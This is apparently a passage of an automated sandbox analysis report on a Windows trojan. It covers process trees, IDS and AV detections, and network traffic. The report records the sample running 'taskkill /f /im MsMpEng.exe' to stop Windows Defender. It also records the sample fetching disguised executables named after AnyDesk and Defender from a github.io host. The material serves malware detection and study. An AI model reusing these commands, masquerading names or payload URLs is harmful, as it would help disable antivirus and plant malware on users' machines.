      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1780 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • Conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5156 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6928 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4020 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2136 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • Conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5996 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7076 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3524 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6796 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6796, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-29T02:26:01.175695+020020010463Misc activity185.199.110.153443192.168.2.649710TCP
2024-09-29T02:26:01.965049+020020010463Misc activity185.199.110.153443192.168.2.649711TCP
2024-09-29T02:26:02.839748+020020010463Misc activity185.199.110.153443192.168.2.649712TCP
2024-09-29T02:26:10.297385+020020010463Misc activity185.199.110.153443192.168.2.649715TCP
2024-09-29T02:26:11.170934+020020010463Misc activity185.199.110.153443192.168.2.649717TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-29T02:26:01.082281+020028033053Unknown Traffic192.168.2.649710185.199.110.153443TCP
2024-09-29T02:26:01.872232+020028033053Unknown Traffic192.168.2.649711185.199.110.153443TCP
2024-09-29T02:26:02.740638+020028033053Unknown Traffic192.168.2.649712185.199.110.153443TCP
2024-09-29T02:26:09.596623+020028033053Unknown Traffic192.168.2.649714185.199.110.153443TCP
2024-09-29T02:26:10.202534+020028033053Unknown Traffic192.168.2.649715185.199.110.153443TCP
2024-09-29T02:26:11.082553+020028033053Unknown Traffic192.168.2.649717185.199.110.153443TCP
2024-09-29T02:26:17.685412+020028033053Unknown Traffic192.168.2.649721185.199.110.153443TCP
2024-09-29T02:26:24.719024+020028033053Unknown Traffic192.168.2.649724185.199.110.153443TCP
2024-09-29T02:26:31.217086+020028033053Unknown Traffic192.168.2.649725185.199.110.153443TCP
2024-09-29T02:26:37.673371+020028033053Unknown Traffic192.168.2.649726185.199.110.153443TCP
2024-09-29T02:26:44.000738+020028033053Unknown Traffic192.168.2.649728185.199.110.153443TCP
2024-09-29T02:26:50.547457+020028033053Unknown Traffic192.168.2.649729185.199.110.153443TCP
2024-09-29T02:26:56.517807+020028033053Unknown Traffic192.168.2.649731185.199.110.153443TCP
2024-09-29T02:27:02.499688+020028033053Unknown Traffic192.168.2.649733185.199.110.153443TCP
2024-09-29T02:27:08.462279+020028033053Unknown Traffic192.168.2.649734185.199.110.153443TCP
2024-09-29T02:27:14.453356+020028033053Unknown Traffic192.168.2.649735185.199.110.153443TCP
2024-09-29T02:27:20.468666+020028033053Unknown Traffic192.168.2.649736185.199.110.153443TCP
2024-09-29T02:27:26.655782+020028033053Unknown Traffic192.168.2.649737185.199.110.153443TCP
2024-09-29T02:27:32.889465+020028033053Unknown Traffic192.168.2.649739185.199.110.153443TCP
2024-09-29T02:27:39.281130+020028033053Unknown Traffic192.168.2.649740185.199.110.153443TCP
2024-09-29T02:27:45.756534+020028033053Unknown Traffic192.168.2.649741185.199.110.153443TCP
2024-09-29T02:27:52.185949+020028033053Unknown Traffic192.168.2.649742185.199.110.153443TCP
2024-09-29T02:27:58.464364+020028033053Unknown Traffic192.168.2.649743185.199.110.153443TCP
2024-09-29T02:28:04.777993+020028033053Unknown Traffic192.168.2.649744185.199.110.153443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exeReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exeReversingLabs: Detection: 28%
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exeReversingLabs: Detection: 31%
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeReversingLabs: Detection: 28%
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeReversingLabs: Detection: 31%
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78832B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6C78832B4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A9B94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF76E1A9B94
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA9590E0 FindFirstFileExW,7_2_00007FF7AA9590E0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB32B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_00007FF71DDB32B4
Source: global trafficHTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/AnyDeskCrashHandler.exe HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/MicrosoftWindowsDefenderCoreService.exe HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/AnyDeskUpdateService.exe HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: Joe Sandbox ViewIP Address: 185.199.110.153 185.199.110.153
Source: Joe Sandbox ViewIP Address: 185.199.110.153 185.199.110.153
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49714 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49717 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49735 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49721 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49710 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49724 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49733 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49737 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49743 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49725 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49712 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49734 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49739 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49715
Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49710
Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49717
Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49712
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49711
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49744 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49741 -> 185.199.110.153:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49731 -> 185.199.110.153:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785CDF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,0_2_00007FF6C785CDF0
Source: global trafficHTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/AnyDeskCrashHandler.exe HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/MicrosoftWindowsDefenderCoreService.exe HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/AnyDeskUpdateService.exe HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficHTTP traffic detected: GET /file/version.txt HTTP/1.1Host: duy-thanh.github.io
Source: global trafficDNS traffic detected: DNS query: duy-thanh.github.io
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.00000276209D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/1
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/=R
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, AnyDeskUpdateService.exeString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exe
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.execdf-ms
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exedll
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exehttps://duy-thanh.github.io/file/AnyDeskUpda
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exen
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup%l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetupz
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exey
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exez
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskS
Source: AnyDeskUpdateService.exe, 00000020.00000002.3385629324.0000009560FAC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegratL
Source: AnyDeskUpdateService.exe, 00000020.00000002.3386537801.0000009561CFD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegratP
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, AnyDeskUpdateService.exeString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll(l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll8l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllRo-
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllao
